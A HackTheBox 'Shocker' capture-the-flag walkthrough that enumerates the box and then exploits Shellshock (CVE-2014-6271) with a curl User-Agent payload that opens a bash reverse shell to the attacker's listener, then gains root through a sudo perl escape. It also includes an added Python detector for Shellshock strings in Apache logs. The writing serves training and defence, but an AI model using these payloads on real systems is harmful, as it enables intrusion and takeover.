HackTheBox Shocker Writeup
Explore the fundamentals of cybersecurity in the Shocker Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.10.56 shocker.htb
Script to add hosts automatically
ip="10.10.10.56"
domain="shocker.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV shocker.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 21:03 CEST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2014-6271 (Shellshock)
Directory Bruteforcing with dirb
First, run dirb to scan for directories on the target:
dirb http://shocker.htb/
You will find the cgi-bin directory.
Fuzzing for Shellshock Vulnerable Scripts
Use ffuf to fuzz for potential vulnerable .sh scripts inside the cgi-bin directory:
ffuf -u http://shocker.htb/cgi-bin/FUZZ.sh -c -w /usr/share/dirb/wordlists/small.txt
Exploiting CVE-2014-6271 (Shellshock)
Set up a listener to catch the reverse shell:
nc -lvnp 9001
Then, use curl to exploit the Shellshock vulnerability by sending a malicious User-Agent header. Replace <vpn-ip> with your actual VPN IP to receive the connection:
curl -H "User-Agent: () { :;}; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1'" http://shocker.htb/cgi-bin/user.sh
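A request like the one above leaves a recognisable trace in the Apache access log, because the User-Agent value is logged verbatim. The following is an added example, not part of the original writeup: a Python detector that scans combined-format log lines for the `() {` function-definition prefix. The sample log lines, IP addresses and the `find_shellshock` name are constructed for illustration.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Function-definition prefix "() {" that a vulnerable bash parses from an environment value.
# Whitespace is allowed to vary so "(){" and "( ) {" are also caught.
PREFIX = re.compile(r'\(\s*\)\s*\{')


def find_shellshock(lines):
    """Return one finding per log line that carries the prefix in a logged field."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if m is None:
            # Do not skip lines the parser cannot read; scan them raw instead.
            if PREFIX.search(line):
                findings.append({"line": number, "ip": None, "path": None,
                                 "status": None, "fields": ["raw"]})
            continue
        fields = [f for f in ("request", "referer", "agent") if PREFIX.search(m.group(f))]
        if fields:
            parts = m.group("request").split()
            findings.append({"line": number, "ip": m.group("ip"),
                             "path": parts[1] if len(parts) > 1 else None,
                             "status": int(m.group("status")), "fields": fields})
    return findings


# Constructed sample lines (documentation IP ranges, harmless "echo probe" payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Sep/2024:21:10:01 +0200] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [27/Sep/2024:21:12:44 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; echo probe"',
    '198.51.100.7 - - [27/Sep/2024:21:12:50 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "(){ :; }; echo probe" "curl/8.5.0"',
    '192.0.2.10 - - [27/Sep/2024:21:13:02 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/8.5.0"',
    'garbled () { :;}; echo probe',
]

if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE_LOG):
        print(finding)
```

The combined log format records only the request line, Referer and User-Agent, so a payload carried in any other header does not appear in this log and has to be caught elsewhere, for example by a WAF or by patching bash.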
Accessing the Target System
Once you receive the reverse shell, you can access files like:
cat /home/shelly/user.txt
Escalating Privileges with Sudo
Check for sudo permissions:
sudo -l
If you see the following entry:
(root) NOPASSWD: /usr/bin/perl
You can escalate privileges by running:
sudo perl -e 'exec "/bin/bash";'
This will give you a root shell.
cat /root/root.txt